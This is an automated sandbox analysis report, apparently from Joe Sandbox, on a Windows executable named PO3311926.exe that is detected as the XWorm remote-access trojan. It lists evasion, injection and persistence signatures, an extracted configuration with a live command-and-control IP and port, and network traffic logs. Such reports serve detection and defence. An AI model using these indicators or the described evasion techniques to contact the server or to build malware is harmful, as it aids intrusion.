Windows Analysis Report
PO3311926.exe

Overview

General Information

Sample name: PO3311926.exe
Analysis ID: 1433216
MD5: 543e7940dd0ac8e9e42c0120515ec6b6
SHA1: 6dca4a5e851e1ccae98afba16d01a5f9b9553c59
SHA256: c1bf9e8d217baf7a33931f25d96ff9eab4c24f9702beaa41a91bcab3745a1875
Tags: exe
Infos:

Detection

XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AntiVM autoit script
Yara detected Autoit Injector
Yara detected XWorm
.NET source code contains potential unpacker
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Found API chain indicative of sandbox detection
Injects a PE file into a foreign processes
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses ipconfig to lookup or modify the Windows network settings
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query the security center for anti-virus and firewall products
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
OS version to string mapping found (often used in BOTs)
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Use NTFS Short Name in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection

Classification

AV Detection
barindex
Found malware configuration
Source: 8.3.sdadbtvsh.bin.17b6130.0.raw.unpack Malware Configuration Extractor: Xworm {"C2 url": ["102.165.14.26"], "Port": "5007", "Aes key": "5007", "Install file": "USB.exe", "Version": "XWorm V2.1"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Virustotal: Detection: 27% Perma Link
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin.exe ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin.exe Virustotal: Detection: 27% Perma Link
Source: C:\Users\user\wrse\sdadbtvsh.bin ReversingLabs: Detection: 26%
Source: C:\Users\user\wrse\sdadbtvsh.bin Virustotal: Detection: 27% Perma Link
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe ReversingLabs: Detection: 26%
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Virustotal: Detection: 27% Perma Link
Multi AV Scanner detection for submitted file
Source: PO3311926.exe ReversingLabs: Detection: 68%
Source: PO3311926.exe Virustotal: Detection: 55% Perma Link
Uses 32bit PE files
Source: PO3311926.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 23.206.229.226:443 -> 192.168.2.8:49707 version: TLS 1.0
Source: unknown HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.221.246.93:443 -> 192.168.2.8:49729 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.221.246.93:443 -> 192.168.2.8:49730 version: TLS 1.2
Source: PO3311926.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: PO3311926.exe
Source: Binary string: RegSvcs.pdb, source: RegSvcs.exe, 00000012.00000000.1618125774.0000000000D32000.00000002.00000001.01000000.0000000D.sdmp, RegSvcs.exe.15.dr
Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, 00000012.00000000.1618125774.0000000000D32000.00000002.00000001.01000000.0000000D.sdmp, RegSvcs.exe.15.dr
Source: C:\Users\user\Desktop\PO3311926.exe Code function: 0_2_00BAA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 0_2_00BAA69B
Source: C:\Users\user\Desktop\PO3311926.exe Code function: 0_2_00BBC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW, 0_2_00BBC220
Source: C:\Users\user\Desktop\PO3311926.exe Code function: 0_2_00BCB348 FindFirstFileExA, 0_2_00BCB348
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_005FE387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 8_2_005FE387
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_005FD836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 8_2_005FD836
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_005FDB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 8_2_005FDB69
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_00609F9F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 8_2_00609F9F
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_0060A0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 8_2_0060A0FA
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_0060A488 FindFirstFileW,Sleep,FindNextFileW,FindClose, 8_2_0060A488
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_006065F1 FindFirstFileW,FindNextFileW,FindClose, 8_2_006065F1
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_005CC642 FindFirstFileExW, 8_2_005CC642
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_00607248 FindFirstFileW,FindClose, 8_2_00607248
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_006072E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 8_2_006072E9
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Code function: 20_2_00ACE387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 20_2_00ACE387
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Code function: 20_2_00ACD836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 20_2_00ACD836
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Code function: 20_2_00AD9F9F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 20_2_00AD9F9F
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Code function: 20_2_00ADA0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 20_2_00ADA0FA
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Code function: 20_2_00ADA488 FindFirstFileW,Sleep,FindNextFileW,FindClose, 20_2_00ADA488
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Code function: 20_2_00AD65F1 FindFirstFileW,FindNextFileW,FindClose, 20_2_00AD65F1
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Code function: 20_2_00A9C642 FindFirstFileExW, 20_2_00A9C642
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Code function: 20_2_00AD72E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 20_2_00AD72E9
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Code function: 20_2_00AD7248 FindFirstFileW,FindClose, 20_2_00AD7248
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Code function: 20_2_00ACDB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 20_2_00ACDB69

Networking
barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: 102.165.14.26
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.8:49708 -> 102.165.14.26:5007
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 239.255.255.250 239.255.255.250
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: ASDETUKhttpwwwheficedcomGB ASDETUKhttpwwwheficedcomGB
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 23.206.229.226:443 -> 192.168.2.8:49707 version: TLS 1.0
Source: unknown TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 102.165.14.26
Source: unknown TCP traffic detected without corresponding DNS query: 102.165.14.26
Source: unknown TCP traffic detected without corresponding DNS query: 102.165.14.26
Source: unknown TCP traffic detected without corresponding DNS query: 102.165.14.26
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 102.165.14.26
Source: unknown TCP traffic detected without corresponding DNS query: 72.21.81.240
Source: unknown TCP traffic detected without corresponding DNS query: 72.21.81.240
Source: unknown TCP traffic detected without corresponding DNS query: 102.165.14.26
Source: unknown TCP traffic detected without corresponding DNS query: 102.165.14.26
Source: unknown TCP traffic detected without corresponding DNS query: 102.165.14.26
Source: unknown TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_0060D7A1 InternetReadFile,SetEvent,GetLastError,SetEvent, 8_2_0060D7A1
Source: global traffic HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=VT3pXKsaaw8sTtx&MD=cPzR33Sv HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=VT3pXKsaaw8sTtx&MD=cPzR33Sv HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIkqHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIkqHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRRtT5aGKXUvbEGIjD-kgWdpW8hT-9hc2nj_b9H1bs6sOSvG1viHx2oR-H037B_HudVAHyts9ARK3nBSXsyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-04-29-09; NID=513=i4vGxEho67hIbT78H4sdvR3RiGAbuswNQATGLpxg1ZwbZWfPfJEEpO9gKebEs9GpjkyVn_LdpJxbX71dSG1YWSxKprI50Iw_R0SzrRyArmtuuOy3FX2os12m5mg3IOH4454YlQzymsc0wKOKj9gGLzAcNZLcSnF8tYSI_CuAr-Y
Source: global traffic HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRRtT5aGKXUvbEGIjDdp0aB_5C1gr2eixUtAMj4mBUQzkJ9vh0Q2d77njF6aqNILXZ84lvrwl1-Gwx1dfsyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIkqHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-04-29-09; NID=513=i4vGxEho67hIbT78H4sdvR3RiGAbuswNQATGLpxg1ZwbZWfPfJEEpO9gKebEs9GpjkyVn_LdpJxbX71dSG1YWSxKprI50Iw_R0SzrRyArmtuuOy3FX2os12m5mg3IOH4454YlQzymsc0wKOKj9gGLzAcNZLcSnF8tYSI_CuAr-Y
Source: global traffic HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: PO3311926.exe, 00000000.00000003.1398209942.0000000006C44000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1519361059.00000000017BA000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1541378259.00000000017BD000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe0.8.dr, sdadbtvsh.bin.0.dr, sdadbtvsh.bin.exe.8.dr, sdadbtvsh.bin.8.dr String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: PO3311926.exe, 00000000.00000003.1398209942.0000000006C44000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1519361059.00000000017BA000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1541378259.00000000017BD000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe0.8.dr, sdadbtvsh.bin.0.dr, sdadbtvsh.bin.exe.8.dr, sdadbtvsh.bin.8.dr String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: PO3311926.exe, 00000000.00000003.1398209942.0000000006C44000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1519361059.00000000017BA000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1541378259.00000000017BD000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe0.8.dr, sdadbtvsh.bin.0.dr, sdadbtvsh.bin.exe.8.dr, sdadbtvsh.bin.8.dr String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: PO3311926.exe, 00000000.00000003.1398209942.0000000006C44000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1519361059.00000000017BA000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1541378259.00000000017BD000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe0.8.dr, sdadbtvsh.bin.0.dr, sdadbtvsh.bin.exe.8.dr, sdadbtvsh.bin.8.dr String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: PO3311926.exe, 00000000.00000003.1398209942.0000000006C44000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1519361059.00000000017BA000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1541378259.00000000017BD000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe0.8.dr, sdadbtvsh.bin.0.dr, sdadbtvsh.bin.exe.8.dr, sdadbtvsh.bin.8.dr String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: PO3311926.exe, 00000000.00000003.1398209942.0000000006C44000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1519361059.00000000017BA000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1541378259.00000000017BD000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe0.8.dr, sdadbtvsh.bin.0.dr, sdadbtvsh.bin.exe.8.dr, sdadbtvsh.bin.8.dr String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: PO3311926.exe, 00000000.00000003.1398209942.0000000006C44000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1519361059.00000000017BA000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1541378259.00000000017BD000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe0.8.dr, sdadbtvsh.bin.0.dr, sdadbtvsh.bin.exe.8.dr, sdadbtvsh.bin.8.dr String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: PO3311926.exe, 00000000.00000003.1398209942.0000000006C44000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1519361059.00000000017BA000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1541378259.00000000017BD000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe0.8.dr, sdadbtvsh.bin.0.dr, sdadbtvsh.bin.exe.8.dr, sdadbtvsh.bin.8.dr String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: PO3311926.exe, 00000000.00000003.1398209942.0000000006C44000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1519361059.00000000017BA000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1541378259.00000000017BD000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe0.8.dr, sdadbtvsh.bin.0.dr, sdadbtvsh.bin.exe.8.dr, sdadbtvsh.bin.8.dr String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: PO3311926.exe, 00000000.00000003.1398209942.0000000006C44000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1519361059.00000000017BA000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1541378259.00000000017BD000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe0.8.dr, sdadbtvsh.bin.0.dr, sdadbtvsh.bin.exe.8.dr, sdadbtvsh.bin.8.dr String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: PO3311926.exe, 00000000.00000003.1398209942.0000000006C44000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1519361059.00000000017BA000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1541378259.00000000017BD000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe0.8.dr, sdadbtvsh.bin.0.dr, sdadbtvsh.bin.exe.8.dr, sdadbtvsh.bin.8.dr String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: PO3311926.exe, 00000000.00000003.1398209942.0000000006C44000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1519361059.00000000017BA000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmp, sdadbtvsh.bin, 00000008.00000003.1541378259.00000000017BD000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000000.1648993329.0000000000B35000.00000002.00000001.01000000.0000000E.sdmp, sdadbtvsh.bin.exe, 0000001A.00000000.1866878871.0000000000B35000.00000002.00000001.01000000.0000000E.sdmp, sdadbtvsh.bin.exe, 00000023.00000002.2210000278.0000000000B35000.00000002.00000001.01000000.0000000E.sdmp, sdadbtvsh.bin.exe0.8.dr, sdadbtvsh.bin.0.dr, sdadbtvsh.bin.exe.8.dr, sdadbtvsh.bin.8.dr String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: PO3311926.exe, 00000000.00000003.1398209942.0000000006C44000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1519361059.00000000017BA000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1541378259.00000000017BD000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe0.8.dr, sdadbtvsh.bin.0.dr, sdadbtvsh.bin.exe.8.dr, sdadbtvsh.bin.8.dr String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: PO3311926.exe, 00000000.00000003.1398209942.0000000006C44000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1519361059.00000000017BA000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1541378259.00000000017BD000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe0.8.dr, sdadbtvsh.bin.0.dr, sdadbtvsh.bin.exe.8.dr, sdadbtvsh.bin.8.dr String found in binary or memory: https://www.globalsign.com/repository/0
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
